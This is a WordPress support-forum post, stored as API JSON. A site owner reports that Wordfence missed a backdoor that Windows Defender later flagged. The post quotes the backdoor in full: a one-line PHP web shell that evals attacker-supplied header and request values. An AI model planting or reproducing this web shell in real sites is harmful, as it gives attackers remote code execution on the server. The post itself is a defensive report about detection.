{"id":16742991,"date":"2023-05-16T20:09:12","date_gmt":"2023-05-16T20:09:12","guid":{"rendered":"https:\/\/wordpress.org\/support\/topic\/wordfence-didnt-detect\/"},"modified":"2023-05-16T20:09:12","modified_gmt":"2023-05-16T20:09:12","slug":"wordfence-didnt-detect","status":"publish","type":"topic","link":"https:\/\/wordpress.org\/support\/topic\/wordfence-didnt-detect\/","title":{"rendered":"Wordfence didn&#8217;t detect"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hello,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I got site hacked. Scanned with the Wordfence. Everything seemed OK. After some days again.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I&#8217;ve downloaded the site files and the Windows defender detected Backdoor:PHP\/WebShell!MSR inside file &#8220;.1684137734&#8221;: content of the file is &lt;?php @eval($_HEADERS[&#8220;Sec-Websocket-Accept&#8221;]);@eval($_REQUEST[&#8220;Sec-Websocket-Accept&#8221;]); <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Wordfence didn&#8217;t recognize this file as malicious.<\/p>\n","protected":false},"template":"","class_list":["post-16742991","topic","type-topic","status-publish","hentry","topic-tag-hacked"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/wordpress.org\/support\/wp-json\/wp\/v2\/topic\/16742991","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wordpress.org\/support\/wp-json\/wp\/v2\/topic"}],"about":[{"href":"https:\/\/wordpress.org\/support\/wp-json\/wp\/v2\/types\/topic"}],"version-history":[{"count":0,"href":"https:\/\/wordpress.org\/support\/wp-json\/wp\/v2\/topic\/16742991\/revisions"}],"wp:attachment":[{"href":"https:\/\/wordpress.org\/support\/wp-json\/wp\/v2\/media?parent=16742991"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}